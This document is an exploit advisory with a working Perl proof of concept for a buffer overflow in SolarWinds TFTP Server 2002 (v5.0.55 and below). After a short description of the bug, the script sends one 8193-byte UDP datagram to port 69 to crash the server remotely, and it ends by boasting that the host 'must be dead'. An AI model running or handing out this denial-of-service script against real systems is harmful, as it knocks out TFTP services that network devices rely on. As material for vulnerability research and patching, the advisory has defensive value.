tftp.dos.pl

`#############################################  
#Product: TFTP Server 2002 Standard Edition #  
#Authors: SolarWinds [www.SolarWinds.net] #  
#Vulnerable versions: v.5.0.55 and bellow #  
#Vulnerability: buffer overflow #  
#Bug&exploit by D4rkGr3y [www.dhgroup.org] #  
#############################################  
  
#Overview#--------------------------------------------------------------#  
From TFTP Server help:  
"Many network devices require a TFTP Server to load their initial  
operating system or configuration. Many routers, switches, hubs,  
X-terminals, printers, terminal servers, etc need a TFTP server  
in order to load their initial configuration".  
  
#Description#------------------------------------------------------------#  
First, TFTP - Trivial File Transfer Protocol. This is not FTP! TFTP and  
FTP are different protocols - it's very important! TFTP uses UDP protocol  
for it's work and it doesn't support some FTP's stuff. Directory travel  
for example. U can use TFTP for file transfer only. Read RFC 1350 for  
more details.  
  
#Bug#--------------------------------------------------------------------#  
It's possible to crash TFTP server using UDP datagram with a large size  
(8193b and above). Vulnerable application on remote host will be closed  
with error message:  
  
Run-time error '10040':  
The datagram is too large to fit into the buffer and is truncated.  
  
#Exploit#----------------------------------------------------------------#  
  
#!/usr/bin/perl  
#TFTP Server remote DoS exploit by D4rkGr3y  
use IO::Socket;  
$host = "vulnerable_host";  
$port = "69";  
$data = "q";  
$num = "8193";  
$buf .= $data x $num;  
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";  
$ipaddr = inet_aton($host);  
$portaddr = sockaddr_in($port, $ipaddr);  
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";  
print "Now, '$host' must be dead :)\n";  
  
#EOF  
  
Best regards www.dhgroup.org  
D4rkGr3y icq 540981  
  
  
`